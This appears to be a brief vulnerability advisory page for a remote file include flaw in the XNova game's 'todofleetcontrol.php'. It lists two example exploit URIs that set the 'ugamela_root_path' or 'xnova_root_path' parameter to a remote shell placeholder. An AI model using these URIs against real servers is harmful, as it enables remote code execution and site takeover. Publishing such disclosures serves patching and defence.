XNova Project XNova 'todofleetcontrol.php' Remote File Include Vulnerability

info
discussion
exploit
solution
references

XNova Project XNova 'todofleetcontrol.php' Remote File Include Vulnerability

Attackers can exploit this issue via a browser.

The following example URIs are available:

http://www.example.com/includes/todofleetcontrol.php?ugamela_root_path=[shell]
http://www.example.com/includes/todofleetcontrol.php?xnova_root_path=[shell]